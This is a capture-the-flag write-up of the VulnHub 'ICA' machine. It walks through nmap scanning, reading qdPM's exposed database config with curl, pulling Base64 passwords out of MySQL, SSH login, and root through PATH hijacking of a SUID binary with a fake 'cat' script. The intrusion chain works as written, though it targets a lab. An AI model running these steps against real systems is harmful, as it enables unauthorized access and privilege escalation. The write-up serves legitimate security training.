Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

ICA (VulnHub – Easy)

ICA is a straightforward VulnHub machine centered around exploiting a vulnerable qdPM installation to extract database credentials, pivoting into SSH access, and escalating privileges through a PATH hijacking vulnerability in a SUID binary. The exploitation chain is short but clean, and highlights the importance of secure configuration and safe handling of user passwords.

Overview

Target: 10.10.10.10
Initial vector: qdPM 9.2 configuration leak → MySQL access → credential extraction
Privilege escalation: SUID binary with unsafe PATH → root shell

Enumeration

Port Scan

$ nmap -n -v -T4 -Pn -sS -p- -oN all_tcp_port_scan.txt 10.10.10.10

Service Scan

$ nmap -n -v -T4 -Pn -sCV -p22,80,3306,33060 -oN tcp_service_scan.txt 10.10.10.10

Port 80 hosts a qdPM instance: 

qdPM v9.2

Searchsploit reveals a known vulnerability: 

$ searchsploit qdPM
-> 50176 (Password Exposure)

Foothold – qdPM Database Leak

qdPM stores database credentials in a world‑readable YAML file: 

$ curl http://10.10.10.10/core/config/databases.yml

Use the recovered credentials to access MySQL: 

$ mysql -h 10.10.10.10 -u qdpmadmin -p

Enumerate the database: 

mysql> SHOW DATABASES;
mysql> USE staff;
mysql> SELECT * FROM user;
mysql> SELECT * FROM login;

The login table contains Base64‑encoded passwords: 

c3VSSkFkR3dMcDhkeTNyRg==
N1p3VjRxdGc0MmNtVVhHWA==
WDdNUWtQM1cyOWZld0hkQw==
REpjZVZ5OThXMjhZN3dMZw==
Y3FObkJXQ0J5UzJEdUpTeQ==

Decode them: 

$ for x in $(cat passwords.txt); do echo $x | base64 -d; echo; done

One of the decoded credentials belongs to dexter.

Gaining Access

$ ssh dexter@10.10.10.10

User shell obtained.

Privilege Escalation – PATH Hijacking

Search for SUID binaries: 

$ find / -perm -4000 2>/dev/null > /tmp/SGID.txt

A suspicious binary appears: 

/opt/get_access

Inspect it: 

$ strings /opt/get_access

The binary calls cat without an absolute path — a classic PATH hijacking opportunity.

Exploit

Create a malicious cat in a writable directory:

$ echo -e 'cp /bin/bash /tmp/bash\nchmod 4777 /tmp/bash' > /tmp/cat
$ chmod +x /tmp/cat

Prepend /tmp to PATH: 

$ export PATH=/tmp:$PATH

Execute the vulnerable binary: 

$ /opt/get_access

A SUID bash is created: 

$ /tmp/bash -p
# whoami
root

Conclusion

ICA is a clean exploitation chain: qdPM configuration leakage leads to database access, Base64‑encoded passwords provide SSH credentials, and a poorly designed SUID binary enables PATH hijacking for full root compromise. A great example of how insecure web app deployments can cascade into complete system takeover.